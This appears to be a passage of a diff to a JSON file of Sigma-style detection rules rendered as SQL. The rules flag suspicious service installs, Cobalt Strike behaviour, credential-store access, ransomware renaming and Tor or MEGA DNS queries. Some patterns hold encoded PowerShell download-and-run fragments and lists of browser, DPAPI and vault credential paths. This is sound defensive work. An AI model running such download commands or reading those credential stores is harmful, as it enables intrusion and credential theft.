'%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" ], - "filename": "win_system_krbrelayup_service_installation.yml" + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" }, { - "title": "NTFS Vulnerability Exploitation", - "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "status": "test", - "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", + "id": "07a99744-56ac-40d2-97b7-2095967b0e03", + "status": "experimental", + "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", "tags": [ - "attack.impact", - "attack.t1499.001" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_system_ntfs_vuln_exploit.yml" + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" }, { - "title": "CobaltStrike Service Installations - System", - "id": "5a105d34-05fc-401e-8553-272b45c1522d", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "title": "Potential Persistence Via Notepad++ Plugins", + "id": "54127bd4-f541-4ac3-afdb-ea073f63f692", + "status": "experimental", + "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Possible FPs during first installation of Notepad++", + "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Notepad++\\\\plugins\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\Notepad++\\\\updater\\\\gup.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\target.exe' ESCAPE '\\' OR NewProcessName LIKE '%Installer.x64.exe' ESCAPE '\\'))))" ], - "filename": "win_system_cobaltstrike_service_installs.yml" + "filename": "file_event_win_notepad_plus_plus_persistence.yml" }, { - "title": "RTCore Suspicious Service Installation", - "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", + "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "status": "experimental", - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "win_system_susp_rtcore64_service_install.yml" + "filename": "file_event_win_powershell_startup_shortcuts.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - System", - "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "title": "Rename Common File to DLL File", + "id": "bbfd974c-248e-4435-8de6-1e938c79c5c1", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", + "author": "frack113", + "falsepositives": [ + "Application installation" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.dll' ESCAPE '\\' AND NOT (((SourceFilename LIKE '%.dll' ESCAPE '\\' OR SourceFilename LIKE '%.tmp' ESCAPE '\\') OR (SourceFilename LIKE '%.dll.%' ESCAPE '\\' OR SourceFilename LIKE '%\\\\SquirrelTemp\\\\temp%' ESCAPE '\\')) OR (SourceFilename = '') OR (SourceFilename = '') OR (NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + ], + "filename": "file_rename_win_not_dll_to_dll.yml" + }, + { + "title": "Suspicious Appended Extension", + "id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", + "status": "experimental", + "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1486" + ], + "falsepositives": [ + "Backup software" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (((SourceFilename LIKE '%.lnk' ESCAPE '\\' OR SourceFilename LIKE '%.rtf' ESCAPE '\\' OR SourceFilename LIKE '%.pst' ESCAPE '\\' OR SourceFilename LIKE '%.docx' ESCAPE '\\' OR SourceFilename LIKE '%.xlsx' ESCAPE '\\' OR SourceFilename LIKE '%.jpg' ESCAPE '\\' OR SourceFilename LIKE '%.jpeg' ESCAPE '\\' OR SourceFilename LIKE '%.png' ESCAPE '\\' OR SourceFilename LIKE '%.pdf' ESCAPE '\\') AND (TargetFilename LIKE '%.lnk.%' ESCAPE '\\' OR TargetFilename LIKE '%.rtf.%' ESCAPE '\\' OR TargetFilename LIKE '%.pst.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg.%' ESCAPE '\\' OR TargetFilename LIKE '%.png.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.old' ESCAPE '\\' OR TargetFilename LIKE '%.orig' ESCAPE '\\' OR TargetFilename LIKE '%.backup' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.c~' ESCAPE '\\')))" + ], + "filename": "file_rename_win_ransomware.yml" + }, + { + "title": "Unusual File Modification by dns.exe", + "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "status": "experimental", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", + "tags": [ + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_clip_services.yml" + "filename": "file_change_win_unusual_modification_by_dns_exe.yml" }, { - "title": "Suspicious Service Installation", - "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "title": "File Creation Date Changed to Another Year", + "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "status": "experimental", - "description": "Detects suspicious service installation commands", - "author": "pH-T (Nextron Systems)", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1070.006", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Changes made to or by the local NTP service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" ], - "filename": "win_system_susp_service_installation.yml" + "filename": "file_change_win_2022_timestomping.yml" }, { - "title": "Tap Driver Installation", - "id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Suspicious Access To Browser Credential Files", + "id": "91cb43db-302a-47e3-b3c8-7ede481e27bf", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.t1003", + "attack.credential_access" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Antivirus, Anti-Spyware, Anti-Malware Software", + "Backup software", + "Legitimate software installed on partitions other than \"C:\\\"", + "Searching software such as \"everything.exe\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%tap0901%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((FileName LIKE '%\\\\Appdata\\\\Local\\\\Microsoft\\\\Windows\\\\WebCache\\\\WebCacheV01.dat' ESCAPE '\\' OR (FileName LIKE '%\\\\cookies.sqlite' ESCAPE '\\' OR FileName LIKE '%release\\\\key3.db' ESCAPE '\\' OR FileName LIKE '%release\\\\key4.db' ESCAPE '\\' OR FileName LIKE '%release\\\\logins.json' ESCAPE '\\') OR (FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Network\\\\Cookies%' ESCAPE '\\' OR FileName LIKE '%\\\\Appdata\\\\Local\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Local State%' ESCAPE '\\')) AND NOT ((NewProcessName = 'System' AND ParentProcessName = 'Idle') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\%' ESCAPE '\\')))) AND NOT ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\MpCopyAccelerator.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "win_system_tap_driver_installation.yml" + "filename": "file_access_win_browser_credential_stealing.yml" }, { - "title": "Important Windows Eventlog Cleared", - "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "title": "Suspicious Access To Windows DPAPI Master Keys", + "id": "46612ae6-86be-4802-bc07-39b59feb1309", "status": "experimental", - "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" + "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-18\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-21-%' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_susp_eventlog_cleared.yml" + "filename": "file_access_win_dpapi_master_key_access.yml" }, { - "title": "Mesh Agent Service Installation", - "id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "title": "Credential Manager Access", + "id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", "status": "experimental", - "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", + "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.t1003", + "attack.credential_access" ], "falsepositives": [ - "Legitimate use of the tool" + "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%MeshAgent.exe%' ESCAPE '\\' OR ServiceName LIKE '%Mesh Agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\ProgramData\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_service_install_mesh_agent.yml" + "filename": "file_access_win_credential_manager_stealing.yml" }, { - "title": "Exploit SamAccountName Spoofing with Kerberos", - "id": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", - "status": "test", - "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", - "author": "frack113", + "title": "Suspicious Access To Windows Credential History File", + "id": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1558.003" + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Microsoft-Windows-Kerberos-Key-Distribution-Center' AND EventID IN ('35', '36', '37', '38')) OR (Provider_Name = 'Microsoft-Windows-Directory-Services-SAM' AND EventID IN ('16990', '16991'))))" + "SELECT * FROM logs WHERE (FileName LIKE '%\\\\Microsoft\\\\Protect\\\\CREDHIST' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml" + "filename": "file_access_win_susp_cred_hist_access.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", - "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "AppX Package Installation Attempts Via AppInstaller", + "id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "status": "test", + "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" URI. It attempts to load/install a package from the referenced URL", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller\\_%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppInstaller.exe' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" + "filename": "dns_query_win_lolbin_appinstaller.yml" }, { - "title": "QuarksPwDump Clearing Access History", - "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "status": "test", - "description": "Detects QuarksPwDump clearing access history in hive", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query Tor Onion Address - Sysmon", + "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "status": "experimental", + "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE QueryName LIKE '%.onion%' ESCAPE '\\'" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" + "filename": "dns_query_win_tor_onion.yml" }, { - "title": "Service Installation with Suspicious Folder Pattern", - "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "title": "Regsvr32 Network Activity - DNS", + "id": "36e037c4-c228-4866-b6a3-48eb292b9955", "status": "test", - "description": "Detects service installation with suspicious folder patterns", - "author": "pH-T (Nextron Systems)", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml" + "filename": "dns_query_win_regsvr32_network_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - System", - "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "DNS Query for MEGA.io Upload Domain - Sysmon", + "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\'" ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" + "filename": "dns_query_win_mega_nz.yml" }, { - "title": "DHCP Server Error Failed Loading the CallOut DLL", - "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "title": "DNS HybridConnectionManager Service Bus", + "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "status": "test", - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "author": "Dimitrios Slamaris, @atc_project (fix)", + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (QueryName LIKE 